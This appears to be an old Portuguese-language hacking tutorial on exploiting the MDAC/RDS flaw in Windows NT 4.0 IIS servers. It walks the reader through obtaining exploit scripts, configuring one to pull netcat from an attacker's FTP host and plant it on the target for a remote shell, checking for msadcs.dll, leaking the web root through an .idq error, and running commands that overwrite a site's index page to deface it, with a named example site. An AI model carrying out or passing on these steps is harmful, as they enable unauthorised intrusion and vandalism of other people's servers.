Bug (Rds)

Introdução

Ae! Essa técnica esta meio ultrapassada, mas muitos ainda não conhecem, e ainda funfa
em servidores winnt4.0. Estamos falando do pacote MDAC (Microsoft Data Access Components)
e da vulnerabilidade encontrada no RDS que, em conjunto com o uso do acesso de dados
via ODBC, possibilita o acesso não autorizado ao servidor Windows.

Do que eu preciso?

é necessário o Perl instalado no seu sistema, caso não tem, entre em www.perl.com e
pegue a versão do seu só. você precisa tb de dois arquivos: msadc.pl e sas.pl. Podem ser
encontrados no site www.hack.co.za. Chegando lá, entre na parte de WindowsNT e procure por
'rds_rootkit.zip' e faca o download (duh). Se você preferir,faca um servidor de ftp na sua
maquina ( você saberá pq mais abaixo ). Ou então, cadastre-se em algum servidor gratuito
e envie o nc (netcat) para lá. O nc pode ser encontrado no site www.l0pht.com/~weld/netcat
Envie-o o nc puro, ou seja, evie-o com extensão .exe (send nc.exe).

Observações

(1) Coloque o sas.pl e o msadc.pl dentro do diretório C:\Perl\Bin. /* winusers */

(2) Edite o arquivo sas.pl para configura-lo (use qualquer editor):


$port = 50111; # porta q será aberta no server

$your = "200.211.896.23"; # ftp de onde se encontra o nc

$user = "anonymous"; # usuário para acessar o ftp

$pass = 'password'; # password do usuário


O sas.pl vai entrar no ftp especificado por você e ira pegar
o nc.exe, enviando-o para o servidor especificado. Caso opte por fazer
um servidor de ftp na sua maquina, entre em www.grátis.com.br e pegue
algum lá.Caso opte por cadastrar um site, entre em www.domainvalet.com
e cadastre um site .com, .org ou .net e envie o nc.exe para lá.

Como saber se o host esta vulnerável?

Para saber se uma maquina esta vulnerável ao ataque de rds,você precisa
ir no seu browser e digitar:

http://www.Servidor.Com.br/msadc/msadcs.dll

Caso o arquivo seja encontrado, provavelmente o servidor esta vulnerável.

Entrando no sistema

Finalmente a parte mais interessante. Porem, para você entrar no sistema,
a sua maquina já deve estar com o perl instalado.

Segue a string:

perl sas.pl www.host-alvo.com

O sas.pl vai buscar o nc.exe no ftp solicitado e depois vai envia-lo para
o host especificado. Pode ate parecer que é o sas.pl que faz todo o trabalho,
mas não é! Depois você olha no código dos dois p/ você ver como funciona. Se a
maquina realmente estiver vulnerável, o telnet será aberto e acessara a porta
aberta pelo nc ( aquela que esta no sas.pl, a porta 50111 ) e você caira no:

c:\winnt\system32

Para você hackear a page, faca o seguinte:

perl msadc.pl -h www.host-alvo.com -C "echo FuckZ Admin! > C:\caminhodoroot\index.html"
Mas, como vou saber o caminho do root? Simples, basta você digitar no seu browser:
www.host-alvo.com/qualquercoisa.idq
Logo, vai aparecer algo como:
The IDQ file C:\Inetpub\wwwroot\algumacoisa.idq could not be found
Ótimo! Agora sabemos o caminho do root (C:\inetpub\wwwroot). então, vamos fazer o seguinte:
perl msadc.pl -h www.host-alvo.com -C "Hacked por mim! > C:\inetpub\wwwroot\index.html"
Parabéns, você conseguiu!
Obs: Certifique-se de qual o index da pagina principal (se é index.html, ou index.html,
ou default.asp, etc). Por exemplo, você quer hackear o site www.nasa.com.br e o index da
page principal é eu.asp, então, você deve digitar assim:

perl msadc.pl -h www.nasa.com.br -C "echo hacked por mim! > c:\inetpub\wwwroot\eu.asp

Pronto!

FINALIZANDO

Como viram, essa é uma das mil falhas que podemos tirar proveito. Mas o q eu fico
mais encabulado, é porque, mesmo sabendo que o IIS (Infelizmente Ignoramos segurança) é
uma porcaria, os administradores insistem em usa-lo...